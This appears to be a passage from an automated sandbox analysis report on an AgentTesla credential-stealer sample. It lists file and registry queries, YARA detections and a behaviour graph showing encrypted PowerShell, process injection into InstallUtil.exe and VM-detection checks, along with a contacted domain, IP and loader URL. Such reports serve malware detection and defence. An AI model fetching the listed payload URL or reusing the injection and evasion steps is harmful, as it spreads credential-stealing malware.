Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nuedxyv\Yjgcdbfyd.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.181709.30142.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.34e1668.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.464525599.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.448531071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.465470969.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.466787528.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.181709.30142.exe PID: 5596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4636, type: MEMORYSTR
Yara detected Credential Stealer
Source: Yara match File source: 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4636, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.3509688.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.34e1668.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Variant.Tedy.181709.30142.exe.35596a8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.464525599.0000000003471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.448531071.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.465470969.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.466787528.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.503624767.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Variant.Tedy.181709.30142.exe PID: 5596, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4636, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 680491 Sample: SecuriteInfo.com.Variant.Te... Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 35 Malicious sample detected (through community Yara rule) 2->35 37 Antivirus detection for URL or domain 2->37 39 Antivirus / Scanner detection for submitted sample 2->39 41 7 other signatures 2->41 7 SecuriteInfo.com.Variant.Tedy.181709.30142.exe 16 7 2->7         started        12 Yjgcdbfyd.exe 14 2 2->12         started        14 Yjgcdbfyd.exe 2 2->14         started        process3 dnsIp4 29 inspire-ts.com 62.210.244.157, 443, 49748, 49839 OnlineSASFR France 7->29 23 C:\Users\user\AppData\...\Yjgcdbfyd.exe, PE32 7->23 dropped 25 C:\Users\...\Yjgcdbfyd.exe:Zone.Identifier, ASCII 7->25 dropped 27 SecuriteInfo.com.V...81709.30142.exe.log, ASCII 7->27 dropped 43 Encrypted powershell cmdline option found 7->43 45 Writes to foreign memory regions 7->45 47 Injects a PE file into a foreign processes 7->47 16 InstallUtil.exe 2 7->16         started        19 powershell.exe 17 7->19         started        31 192.168.2.1 unknown unknown 12->31 49 Antivirus detection for dropped file 12->49 51 Multi AV Scanner detection for dropped file 12->51 53 Machine Learning detection for dropped file 12->53 file5 signatures6 process7 signatures8 33 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 16->33 21 conhost.exe 19->21         started        process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
62.210.244.157
 inspire-ts.com France
12876 OnlineSASFR false

Private

IP
192.168.2.1

Contacted Domains

Name IP Active
inspire-ts.com 62.210.244.157 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://inspire-ts.com/loader/uploads/programme_Lpznednj.png false
  • Avira URL Cloud: safe
 unknown